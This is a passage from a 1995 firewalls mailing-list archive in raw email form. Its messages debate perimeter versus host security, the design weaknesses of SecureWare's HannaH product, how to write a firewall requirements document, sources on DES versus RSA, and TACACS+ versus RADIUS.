PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The impression that I am getting from the > two responses to Gary's message, is that firewall and other network security > are significantly more important than individual host security mechanisms. I think there are two things being said here. First of all, firewalls provide more bang for the buck in terms of security. You can provide much more security with much less staff effort by building a firewall than you can by attempting to secure each individual host. The second point is that complete security on an individual host basis is nearly impossible to achieve if you have a decent-sized LAN. (In our own case, we have about 20 different identifiable groups that want to interoperate relatively freely with each other (and well over 1000 hosts), but have differing amounts of sysadmin time and skill available. To expect every host on our LAN to be adequately secured under these conditions is, at best, unrealistic). The second of these points implies that a firewall is really mandatory unless we're willing to impose security restrictions even upon connections between hosts on our own LAN. I do NOT think that the presence of a firewall implies that individual host security can therefore be totally neglected. But by concentrating the security effort on a perimeter defense, then internally securing hosts based on the importance of security to that particular host and staff time available, one can do the best possible job in a situation where infinite resources to devote to security are not available. > A significant portion of the > security breaches are not from "foreigners" but from discontented and > anti-social "natives" in the electronic world. That hasn't been our experience here, although I grant that in the commercial environment this tends to be true. But dealing with internal security threats is a completely different and much more difficult job. --Greg From firewalls-owner Fri Sep 1 10:00:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03434 for firewalls-outgoing; Fri, 1 Sep 1995 09:46:50 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA03420 for ; Fri, 1 Sep 1995 09:46:37 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA13852; Fri, 1 Sep 95 12:18:00 -0400 Date: Fri, 1 Sep 95 12:17:59 -0400 Message-Id: <9509011618.AA13852@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Security Paradigms (was HannaH) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >One of HannaH's advantages is that it provides a mechinism to provide >security based on the identity of a person rather than a host. The old >Internet concept of host is out of date. Hosts were multi-user systems >owned and MANAGED by organizations and individual people were >authenticated by those hosts. With the proliferation of PC class >systems, many systems connected to networks are single user systems. >The old assumptions about security (like the "secure" ports below 512/1024) >can be vary dangerous. Charles hits on a very important point: in the daze of old when sysadmins were men and smelled like....sorry rong parable. In the day of the mainframe, it was in a glass room and had things like "system consoles". Users were often numbered in the thousands but limited in what they could do. In the beginning this was not a matter of security, rather a matter of keeping user "B" from crashing the system when user "A" was 72 hours into a 73 hour Hydracode run. The operators/sysadmins were highly trained individuals who may have gone to week-long schools on things like "device drivers", "networking","basic system management", "advanced system management" partly paid by the company but mostly supplied as part of the multi-million dollar system lease. Today we have about the same number of users but *each one* has full "system privilege" over a U$3,000 machine that *might* come with a tutorial written for illiterates. These people are not "trained", like Topsy they "just happen". WE CANNOT AFFORD TO TRAIN THEM. We do not have the resources, or the time, or the "lost productivity" such training would entail. Besides if we did they would immediately command 40% more pay. As a result, we have had to move security off the host/node to "somewhere else". In most cases this is at the firewall/network/subnet level where it again becomes managable with available resources. I do not see HannaH as a "user level" mechanism. I do see it as a potentially valuable system for a trusted host on a Bastien Network designed to make sensitive information available to customers via the Internet. This is not a blue sky problem, it is a real one I face daily. But the point is that we do not have the *luxury* of NOT having a "soft chewy center", it is the reality of the 90's that unless you are a well funded government agency, you can't afford a hardened compartmented center where every node can be trusted. We do what we can with what we have and to me, HannaH sounds like it could be a valuable tool. Warmly, Padgett From firewalls-owner Fri Sep 1 10:32:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA05660 for firewalls-outgoing; Fri, 1 Sep 1995 10:28:26 -0700 Received: from ix6.ix.netcom.com (ix6.ix.netcom.com [199.182.120.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA05632 for ; Fri, 1 Sep 1995 10:28:21 -0700 Received: from by ix6.ix.netcom.com (8.6.12/SMI-4.1/Netcom) id KAA23363; Fri, 1 Sep 1995 10:24:13 -0700 Date: Fri, 1 Sep 1995 10:24:13 -0700 Message-Id: <199509011724.KAA23363@ix6.ix.netcom.com> From: clp2@ix.netcom.com (Carol pollard ) Subject: Firewall Requirements Document To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ---- Begin Forwarded Message From: clp2@ix.netcom.com (Carol pollard ) Subject: Firewall Requirements Document To: firewall@greatcircle.com After monitoring this maillist, I get the impression that the majority of firewall implementations are managed by the network technician experts. Being a security risk analyst, I certainly see why. For whatever reasons, it was decided that our firewall design and implementation project would be lead by our security staff...me!! Obviously, I've had to learn as much about networking as possible and now have a greater appreciation for their responsibility and knowledge! I've been in the process of documenting our requirements for firewall, but most of them are from a security perspective. Is anyone willing to share with me their process for developing a requirements document, that covers both security-related and networking-related issues. Should requirement documents for firewalls be detailed or at a high level? Are we actually taking the time to document requirements?? We don't do anything without a requirements doc, but usually the person writing the doc has been deemed the "expert". We have our policy, but it's at a very high level. Any help or examples of firewall requirements would be greatly appreciated. Carol ---- End Forwarded Message From firewalls-owner Fri Sep 1 10:38:58 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04727 for firewalls-outgoing; Fri, 1 Sep 1995 10:06:03 -0700 Received: from relay1gw.alcatel.fr (relay1gw.alcatel.fr [193.104.30.53]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA04719 for ; Fri, 1 Sep 1995 10:05:58 -0700 Received: from istans.ansf.alcatel.fr by relay1gw.alcatel.fr with SMTP (1.37.109.8/16.2) id AA14898; Fri, 1 Sep 1995 19:03:54 +0200 Received: from ahqp14.ansf.alcatel.fr ([155.132.120.211]) by istans.ansf.alcatel.fr (4.1/SMI-4.1) id AA03029; Fri, 1 Sep 95 19:06:29 +0200 Message-Id: <9509011706.AA03029@istans.ansf.alcatel.fr> Comments: Authenticated sender is From: "Kare Presttun" Organization: Alcanet International To: Firewalls@GreatCircle.COM Date: Fri, 1 Sep 1995 19:09:21 +0200 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Subject: Re: comparison study between DES and RSA Reply-To: Kare.Presttun@ansf.alcatel.fr Priority: normal X-Mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: Lee Hooi Teck > Date: Fri, 1 Sep 1995 11:18:21 +0800 > Subject: comparison study between DES and RSA > > Hi, > > I am looking into network security currently and found that most of the > products use either DES or RSA for authentication and encryption. > > Is there any info or document that has mentioned the pros and cons of > this two type of cryptosystems? How is these technologies being used in > digital signature? > Go to www.rsa.com and pick up their Crypto FAQ. Go to www.eff.org and pick up another Cryto FAQ, and political stuff. Go to csrc.ncsl.nist.gov and find out what is going on in the key escrow area. There you can also pick up their official statement regarding export (csl bulletin 02-95). There is a lot of other interesting documents there too, like the security FIPS, Good reading. > Hope that there is info for the export issue on these two systems as well. > > Thanks in advance for the help. > > teck Kare ---------------------------------------------------------- | Kare Presttun Alcanet International | | Tel: +33 1 4058 5614 33, rue Emeriau | | Fax: +33 1 4058 5945 F-75015 Paris | | Kare.Presttun@ansf.alcatel.fr FRANCE | From firewalls-owner Fri Sep 1 11:00:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA06890 for firewalls-outgoing; Fri, 1 Sep 1995 10:53:14 -0700 Received: from incog.com (ns.incog.com [199.190.177.251]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA06880 for ; Fri, 1 Sep 1995 10:53:10 -0700 From: mulligan@future.incog.com Received: from coslabs.incog.com by incog.com (SMI-8.6/94082501) id KAA23579; Fri, 1 Sep 1995 10:51:12 -0700 Received: from future.incog.com by coslabs.incog.com (5.x/SMI-SVR4) id AA08138; Fri, 1 Sep 1995 11:51:15 -0600 Received: from future (localhost) by future.incog.com (5.x/SMI-SVR4) id AA07790; Fri, 1 Sep 1995 11:51:15 -0600 Message-Id: <9509011751.AA07790@future.incog.com> To: gary flynn Cc: shields@yage.tembel.org, firewalls-digest@GreatCircle.COM Subject: Re: HannaH from SecureWare Inc. Reply-To: mulligan@incog.com In-Reply-To: Your message of "Fri, 01 Sep 1995 10:00:21 EDT." <199509011409.HAA26521@miles.greatcircle.com> Date: Fri, 01 Sep 1995 11:51:14 -0600 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As with most things in the security arena there is no ONE right solution for everyone. A firewall may be a perfectly fine solution for some organizations and some type of end system security may work for others. If you are a site with hundreds or thousands of end systems, trying to maintain a single centralized control over all these machines would probably be impossible and would definately be a nightmare. Gary Flynn wrote: > 1. Kerberos requires modification of each application that > its to be used with. Hence limited support. Hannah allows > the use of any application using standard winsock or > socket library calls on supported platforms. It is very true that Kerberos requires that each end application be kerberized as SSL and socks requires each application to be modified. One of Hannah failings is that it only supports TCP applications. They say it will support UDP in a future release, but that is easy to do, except that they're key negotiation will be a terrible overhead to pay for small udp packets exchanges. Also what it won't support are things like IP multicast, as will none of the above. > 3. Hannah's "certificate diskette" for each user solves > some problems that Kerberos has on desktop machines. This only solves the problem for PC's or single user desktop machines. Hannah still is only machine based authentication no matter how you wrap it. This doesn't solve the multiuser desktop authentication problem. (There isn't a diskette slot on a VT100.) The "certificate diskette" is yet another potential problem. Since the private key is decrypted off the disk and stored in the end system it is available to be read by anything running on system (especially on PCs) and when the diskette is removed does the private key get removed or does the system maintain its identity/Distingushed Name. It can't check for the presence of the diskette on every packet or it would be too slow to be usable. In addition the private key (though encrypted) on the certificate diskette is copyable. geoff From firewalls-owner Fri Sep 1 11:02:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA06903 for firewalls-outgoing; Fri, 1 Sep 1995 10:53:18 -0700 Received: from incog.com (ns.incog.com [199.190.177.251]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA06889 for ; Fri, 1 Sep 1995 10:53:13 -0700 From: mulligan@future.incog.com Received: from coslabs.incog.com by incog.com (SMI-8.6/94082501) id KAA23581; Fri, 1 Sep 1995 10:51:14 -0700 Received: from future.incog.com by coslabs.incog.com (5.x/SMI-SVR4) id AA08139; Fri, 1 Sep 1995 11:51:21 -0600 Received: from future (localhost) by future.incog.com (5.x/SMI-SVR4) id AA07796; Fri, 1 Sep 1995 11:51:21 -0600 Message-Id: <9509011751.AA07796@future.incog.com> To: gary flynn Cc: shields@yage.tembel.org, firewalls-digest@GreatCircle.COM Subject: Re: HannaH from SecureWare Inc. Reply-To: mulligan@incog.com In-Reply-To: Your message of "Fri, 01 Sep 1995 10:00:21 EDT." <199509011409.HAA26521@miles.greatcircle.com> Date: Fri, 01 Sep 1995 11:51:21 -0600 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As with most things in the security arena there is no ONE right solution for everyone. A firewall may be a perfectly fine solution for some organizations and some type of end system security may work for others. If you are a site with hundreds or thousands of end systems, trying to maintain a single centralized control over all these machines would probably be impossible and would definately be a nightmare. Gary Flynn wrote: > 1. Kerberos requires modification of each application that > its to be used with. Hence limited support. Hannah allows > the use of any application using standard winsock or > socket library calls on supported platforms. It is very true that Kerberos requires that each end application be kerberized as SSL and socks requires each application to be modified. One of Hannah failings is that it only supports TCP applications. They say it will support UDP in a future release, but that is easy to do, except that they're key negotiation will be a terrible overhead to pay for small udp packets exchanges. Also what it won't support are things like IP multicast, as will none of the above. > 3. Hannah's "certificate diskette" for each user solves > some problems that Kerberos has on desktop machines. This only solves the problem for PC's or single user desktop machines. Hannah still is only machine based authentication no matter how you wrap it. This doesn't solve the multiuser desktop authentication problem. (There isn't a diskette slot on a VT100.) The "certificate diskette" is yet another potential problem. Since the private key is decrypted off the disk and stored in the end system it is available to be read by anything running on system (especially on PCs) and when the diskette is removed does the private key get removed or does the system maintain its identity/Distingushed Name. It can't check for the presence of the diskette on every packet or it would be too slow to be usable. In addition the private key (though encrypted) on the certificate diskette is copyable. geoff From firewalls-owner Fri Sep 1 11:35:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA08408 for firewalls-outgoing; Fri, 1 Sep 1995 11:18:20 -0700 Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA08401 for ; Fri, 1 Sep 1995 11:18:13 -0700 Message-Id: <199509011818.LAA08401@miles.greatcircle.com> Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA008448927; Fri, 1 Sep 1995 14:08:47 -0400 Date: Fri, 1 Sep 1995 14:08:47 -0400 From: gary flynn To: mulligan@incog.com Subject: Re: HannaH from SecureWare Inc. Cc: firewalls-digest@GreatCircle.COM, shields@yage.tembel.org Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From mulligan@future.incog.com Fri Sep 1 13:43 EDT 1995 > > As with most things in the security arena there is no ONE right solution > for everyone. A firewall may be a perfectly fine solution for some > organizations and some type of end system security may work for others. > If you are a site with hundreds or thousands of end systems, trying to > maintain a single centralized control over all these machines would > probably be impossible and would definately be a nightmare. > > One of Hannah failings is that it only supports TCP applications. They > say it will support UDP in a future release, but that is easy to do, > except that they're key negotiation will be a terrible overhead to pay > for small udp packets exchanges. Also what it won't support are things > like IP multicast, as will none of the above. > True, it has some limitations. Some will be solved, some may not. But for our users of mainline applications, it seems to cover the bases pretty well. > > 3. Hannah's "certificate diskette" for each user solves > > some problems that Kerberos has on desktop machines. > > This only solves the problem for PC's or single user desktop machines. > Hannah still is only machine based authentication no matter how you wrap > it. This doesn't solve the multiuser desktop authentication problem. > (There isn't a diskette slot on a VT100.) > The bulk of our machines are PCs. I probably should have made that clear. > The "certificate diskette" is yet another potential problem. Since the > private key is decrypted off the disk and stored in the end system it is > available to be read by anything running on system (especially on PCs) > and when the diskette is removed does the private key get removed or > does the system maintain its identity/Distingushed Name. It can't check > for the presence of the diskette on every packet or it would be too slow > to be usable. In addition the private key (though encrypted) on the > certificate diskette is copyable. > I'd put this in the class of "please remember to logoff the system when you are done and before leaving your terminal/PC". The user needs to "unsecure" the desktop before leaving. This may imply turning it off or Hannah may have some procedure to "unauthenticate". The diskette is a threat but physical security addresses that. Thank you for your comments. These exchanges have been very useful. gary From firewalls-owner Fri Sep 1 11:44:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA07945 for firewalls-outgoing; Fri, 1 Sep 1995 11:09:43 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA07922 for ; Fri, 1 Sep 1995 11:09:37 -0700 From: gary@habanero.jmu.edu Received: from UVS1.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA14211; Fri, 1 Sep 95 14:08:11 -0400 Date: Fri, 1 Sep 95 14:08:10 -0400 Message-Id: <9509011808.AA14211@uvs1.orl.mmc.com> To: firewalls-owner@greatcircle.com, firewalls%greatcircle.com@uvs1.dnet.mmc.com Subject: Re: Security Paradigms (was HannaH) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > These people are not "trained", like Topsy they "just happen". WE CANNOT AFFORD > TO TRAIN THEM. We do not have the resources, or the time, or the "lost > productivity" such training would entail. Besides if we did they would > immediately command 40% more pay. > > As a result, we have had to move security off the host/node to "somewhere > else". In most cases this is at the firewall/network/subnet level where it > again becomes managable with available resources. > What about the case where most of the users are non-technical and don't mess with things like what winsock compliant stack they're running. In this case, these things are provided centrally. If they don't mess with them, then they'll work. A malicious user messing with them won't be able to communicate with the hosts that have the same protection. A user that inadvertently overwrites the "secure stack" with an "unsecure stack" also won't be able to communicate and which will result in a helpdesk call. We're not trying to prevent communications with non-secure hosts. We're trying to secure communications between authorized users and critical hosts. Hence, again, if the vast majority of people use the centrally provided software on the desktop, the vast majority will have secure communications. The desktops are mostly PCs and there are a limited number of critical hosts. The manpower to administer the critical hosts is available. Administration of the PCs, in the Hannah case, simply means providing the winsock replacement or shim (I think). This can be handled through the standard desktop software configuration mechanism which may be file server installation, configuration managment software, helpdesk personnel, etc. gary > I do not see HannaH as a "user level" mechanism. I do see it as a potentially > valuable system for a trusted host on a Bastien Network designed to make > sensitive information available to customers via the Internet. This is not > a blue sky problem, it is a real one I face daily. > > But the point is that we do not have the *luxury* of NOT having a "soft > chewy center", it is the reality of the 90's that unless you are a well > funded government agency, you can't afford a hardened compartmented center > where every node can be trusted. We do what we can with what we have and > to me, HannaH sounds like it could be a valuable tool. > > Warmly, > Padgett > > From firewalls-owner Fri Sep 1 11:59:30 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA07695 for firewalls-outgoing; Fri, 1 Sep 1995 11:05:56 -0700 Received: from incog.com (ns.incog.com [199.190.177.251]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA07668; Fri, 1 Sep 1995 11:05:48 -0700 From: mulligan@future.incog.com Received: from coslabs.incog.com by incog.com (SMI-8.6/94082501) id LAA24366; Fri, 1 Sep 1995 11:03:47 -0700 Received: from future.incog.com by coslabs.incog.com (5.x/SMI-SVR4) id AA08294; Fri, 1 Sep 1995 12:03:48 -0600 Received: from future (localhost) by future.incog.com (5.x/SMI-SVR4) id AA07811; Fri, 1 Sep 1995 12:03:49 -0600 Message-Id: <9509011803.AA07811@future.incog.com> To: Charles Cooley Cc: Alan Hannan , David Miller , Gary Flynn , firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, adm_lcorea@VAX1.ACS.JMU.EDU, foxtrot@sware.com, oit_cathy@VAX1.ACS.JMU.EDU, oit_charles@VAX1.ACS.JMU.EDU, oit_dbh@VAX1.ACS.JMU.EDU, shan.bell@sware.com Subject: Re: HannaH from SecureWare Inc. Reply-To: mulligan@incog.com In-Reply-To: Your message of "Fri, 01 Sep 1995 11:22:21 EDT." Date: Fri, 01 Sep 1995 12:03:49 -0600 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Charles Cooley wrote: > While I agree that firewalls are an important defense to provide overall > site security, it's not enough. The impression that I am getting from the > two responses to Gary's message, is that firewall and other network security > are significantly more important than individual host security mechanisms. A combination of host and perimeter security is necessary. Just because people install firewalls doesn't mean that they get rid of passwords, but HannaH does seems to have some design flaws and mentioned in previous messages. > I believe that HannaH should be viewed as an alternative to Virtual LAN > security schemes instead of firewalls and one of the complaints about > Virtual LANs is maintainability. As I mentioned earlier, one of the failings of HannaH is lack of support for IP multicasting which will become much more significant for LANs as more conferencing, phone, video software is distributed. > One of HannaH's advantages is that it provides a mechinism to provide > security based on the identity of a person rather than a host. The old > Internet concept of host is out of date. Hosts were multi-user systems > owned and MANAGED by organizations and individual people were > authenticated by those hosts. With the proliferation of PC class > systems, many systems connected to networks are single user systems. > The old assumptions about security (like the "secure" ports below 512/1024) > can be vary dangerous. If you assume that the systems connecting to the net are single user systems, there is no difference between host authentication and user authentication as long as I have to authenticate myself to the end system. HannaH also doesn't solve the multiuser desktop problem. geoff From firewalls-owner Fri Sep 1 12:02:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA08981 for firewalls-outgoing; Fri, 1 Sep 1995 11:33:14 -0700 Received: from incog.com (ns.incog.com [199.190.177.251]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA08972; Fri, 1 Sep 1995 11:33:10 -0700 From: mulligan@future.incog.com Received: from coslabs.incog.com by incog.com (SMI-8.6/94082501) id LAA24969; Fri, 1 Sep 1995 11:31:21 -0700 Received: from future.incog.com by coslabs.incog.com (5.x/SMI-SVR4) id AA08415; Fri, 1 Sep 1995 12:31:23 -0600 Received: from future (localhost) by future.incog.com (5.x/SMI-SVR4) id AA07836; Fri, 1 Sep 1995 12:31:24 -0600 Message-Id: <9509011831.AA07836@future.incog.com> To: gary flynn Cc: isdmill@gatekeeper.ddp.state.me.us, adm_lcorea@vax1.acs.jmu.edu, firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, foxtrot@sware.com, oit_cathy@vax1.acs.jmu.edu, oit_charles@vax1.acs.jmu.edu, oit_dbh@vax1.acs.jmu.edu, shan.bell@sware.com Subject: Re: HannaH from SecureWare Inc. Reply-To: mulligan@incog.com In-Reply-To: Your message of "Fri, 01 Sep 1995 09:15:25 EDT." <199509011324.GAA25199@miles.greatcircle.com> Date: Fri, 01 Sep 1995 12:31:23 -0600 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Gary wrote: > Hannah is centrally administered although you have to install the > product on all the platforms. So there is a central security > administrator. Software distribution, installation, and configuration > managment mechanisms and policies need to exist for network/node > management anyway, so the addition of one more product shouldn't > negate the overall concept. Oh and this points to another potential problem, they have combined the administrative system with the Certification Authority. This is very very bad. The CA is the box that holds the very sensitive CA private key and having this box on the network just begs to have that key compromised - then anyone and everyone can sign certificates saying they are anyone. All security is lost, the war is lost, the count is 10 and your out. Key management/negotiation overhead is another very critical issue. Their document doesn't mention the protocol used to do this negotiation. What about support for different encryption mechanisms. In addition I haven't heard anything about the actual protocols. They certainly aren't open and publically available. What about interoperability with other systems. They don't seems to be talking with any standards groups. On the other hand there are systems being developed and available that provide much the same functionality (end to end encryption and authentication) without some of the drawbacks (key management overhead, lack of support to multiple encryption techniques, private/closed proprietary protocol, lack of multi-protocol support) such as SKIP and others being worked on in the IPSEC working group. geoff From firewalls-owner Fri Sep 1 12:27:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA07688 for firewalls-outgoing; Fri, 1 Sep 1995 11:05:54 -0700 Received: from incog.com (ns.incog.com [199.190.177.251]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA07666; Fri, 1 Sep 1995 11:05:47 -0700 From: mulligan@future.incog.com Received: from coslabs.incog.com by incog.com (SMI-8.6/94082501) id LAA24360; Fri, 1 Sep 1995 11:03:44 -0700 Received: from future.incog.com by coslabs.incog.com (5.x/SMI-SVR4) id AA08293; Fri, 1 Sep 1995 12:03:43 -0600 Received: from future (localhost) by future.incog.com (5.x/SMI-SVR4) id AA07805; Fri, 1 Sep 1995 12:03:43 -0600 Message-Id: <9509011803.AA07805@future.incog.com> To: Charles Cooley Cc: Alan Hannan , David Miller , Gary Flynn , firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, adm_lcorea@VAX1.ACS.JMU.EDU, foxtrot@sware.com, oit_cathy@VAX1.ACS.JMU.EDU, oit_charles@VAX1.ACS.JMU.EDU, oit_dbh@VAX1.ACS.JMU.EDU, shan.bell@sware.com Subject: Re: HannaH from SecureWare Inc. Reply-To: mulligan@incog.com In-Reply-To: Your message of "Fri, 01 Sep 1995 11:22:21 EDT." Date: Fri, 01 Sep 1995 12:03:43 -0600 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Charles Cooley wrote: > While I agree that firewalls are an important defense to provide overall > site security, it's not enough. The impression that I am getting from the > two responses to Gary's message, is that firewall and other network security > are significantly more important than individual host security mechanisms. A combination of host and perimeter security is necessary. Just because people install firewalls doesn't mean that they get rid of passwords, but HannaH does seems to have some design flaws and mentioned in previous messages. > I believe that HannaH should be viewed as an alternative to Virtual LAN > security schemes instead of firewalls and one of the complaints about > Virtual LANs is maintainability. As I mentioned earlier, one of the failings of HannaH is lack of support for IP multicasting which will become much more significant for LANs as more conferencing, phone, video software is distributed. > One of HannaH's advantages is that it provides a mechinism to provide > security based on the identity of a person rather than a host. The old > Internet concept of host is out of date. Hosts were multi-user systems > owned and MANAGED by organizations and individual people were > authenticated by those hosts. With the proliferation of PC class > systems, many systems connected to networks are single user systems. > The old assumptions about security (like the "secure" ports below 512/1024) > can be vary dangerous. If you assume that the systems connecting to the net are single user systems, there is no difference between host authentication and user authentication as long as I have to authenticate myself to the end system. HannaH also doesn't solve the multiuser desktop problem. geoff From firewalls-owner Fri Sep 1 12:30:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA08970 for firewalls-outgoing; Fri, 1 Sep 1995 11:33:09 -0700 Received: from incog.com (ns.incog.com [199.190.177.251]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA08963; Fri, 1 Sep 1995 11:33:05 -0700 From: mulligan@future.incog.com Received: from coslabs.incog.com by incog.com (SMI-8.6/94082501) id LAA24966; Fri, 1 Sep 1995 11:31:15 -0700 Received: from future.incog.com by coslabs.incog.com (5.x/SMI-SVR4) id AA08412; Fri, 1 Sep 1995 12:31:21 -0600 Received: from future (localhost) by future.incog.com (5.x/SMI-SVR4) id AA07829; Fri, 1 Sep 1995 12:31:21 -0600 Message-Id: <9509011831.AA07829@future.incog.com> To: gary flynn Cc: isdmill@gatekeeper.ddp.state.me.us, adm_lcorea@vax1.acs.jmu.edu, firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, foxtrot@sware.com, oit_cathy@vax1.acs.jmu.edu, oit_charles@vax1.acs.jmu.edu, oit_dbh@vax1.acs.jmu.edu, shan.bell@sware.com Subject: Re: HannaH from SecureWare Inc. Reply-To: mulligan@incog.com In-Reply-To: Your message of "Fri, 01 Sep 1995 09:15:25 EDT." <199509011324.GAA25199@miles.greatcircle.com> Date: Fri, 01 Sep 1995 12:31:21 -0600 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Gary wrote: > Hannah is centrally administered although you have to install the > product on all the platforms. So there is a central security > administrator. Software distribution, installation, and configuration > managment mechanisms and policies need to exist for network/node > management anyway, so the addition of one more product shouldn't > negate the overall concept. Oh and this points to another potential problem, they have combined the administrative system with the Certification Authority. This is very very bad. The CA is the box that holds the very sensitive CA private key and having this box on the network just begs to have that key compromised - then anyone and everyone can sign certificates saying they are anyone. All security is lost, the war is lost, the count is 10 and your out. Key management/negotiation overhead is another very critical issue. Their document doesn't mention the protocol used to do this negotiation. What about support for different encryption mechanisms. In addition I haven't heard anything about the actual protocols. They certainly aren't open and publically available. What about interoperability with other systems. They don't seems to be talking with any standards groups. On the other hand there are systems being developed and available that provide much the same functionality (end to end encryption and authentication) without some of the drawbacks (key management overhead, lack of support to multiple encryption techniques, private/closed proprietary protocol, lack of multi-protocol support) such as SKIP and others being worked on in the IPSEC working group. geoff From firewalls-owner Fri Sep 1 12:30:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA10657 for firewalls-outgoing; Fri, 1 Sep 1995 11:59:49 -0700 Received: from bee.uspnet.usp.br (bee.uspnet.usp.br [143.107.253.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA10350; Fri, 1 Sep 1995 11:54:22 -0700 Received: from caju (caju.larc.usp.br [143.107.111.2]) by bee.uspnet.usp.br (8.6.10/SPARC10-CCE2.0)id PAA07418 Received: from jabuticaba.larc.usp.br by caju (5.0/SMI-SVR4) id AA19599; Fri, 1 Sep 1995 15:23:37 +0300 Received: (from mlrodrig@localhost) by jabuticaba.larc.usp.br (8.6.12/8.6.9) id OAA03757; Fri, 1 Sep 1995 14:36:29 -0300 Date: Fri, 1 Sep 1995 14:36:26 -0300 (EST) From: Marcelo Lopes Rodrigues To: Firewalls@GreatCircle.COM Cc: firewalls-digest@GreatCircle.COM Subject: Re: Use of Remote Authentication: tacacs/radius/etc... In-Reply-To: <199508312303.QAA06065@miles.greatcircle.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII content-length: 412 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk David wrote: > In addition to TACACS and RADIUS, there is now TACACS+. You'll need to be > running IOS 10.3(3) or later to get this. TACACS+ is a complete rewrite of > TACACS. It is a big step ahead of both TACACS and RADIUS. (Yes, I am > biased.) So why is Cisco starting to use Radius? (Packet magazine, Vol. 7, Number 2 , Second Quarter 1995, pag. 13) Marcelo L. Rodrigues mlrodrig@larc.usp.br From firewalls-owner Fri Sep 1 12:32:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11305 for firewalls-outgoing; Fri, 1 Sep 1995 12:09:51 -0700 Received: from incog.com (ns.incog.com [199.190.177.251]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA11297; Fri, 1 Sep 1995 12:09:48 -0700 From: mulligan@future.incog.com Received: from coslabs.incog.com by incog.com (SMI-8.6/94082501) id MAA26332; Fri, 1 Sep 1995 12:07:41 -0700 Received: from future.incog.com by coslabs.incog.com (5.x/SMI-SVR4) id AA08590; Fri, 1 Sep 1995 13:07:49 -0600 Received: from future (localhost) by future.incog.com (5.x/SMI-SVR4) id AA07943; Fri, 1 Sep 1995 13:07:47 -0600 Message-Id: <9509011907.AA07943@future.incog.com> To: gary flynn Cc: mulligan@incog.com, adm_lcorea@vax1.acs.jmu.edu, firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, foxtrot@sware.com, isdmill@gatekeeper.ddp.state.me.us, oit_cathy@vax1.acs.jmu.edu, oit_charles@vax1.acs.jmu.edu, oit_dbh@vax1.acs.jmu.edu, shan.bell@sware.com Subject: Re: HannaH from SecureWare Inc. Reply-To: mulligan@incog.com In-Reply-To: Your message of "Fri, 01 Sep 1995 14:44:37 EDT." <199509011852.LAA25720@incog.com> Date: Fri, 01 Sep 1995 13:07:47 -0600 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Gary wrote: > The Hannah documents indicate that the management workstation and > certificate authority are two different machines. Actually it says that the CA and management gui are separate applications and it just so happens that today you must run the CA on Windows95 and the management gui on HPUX or SCO. > Do products exist? Where can I find more information on these? SKIP for 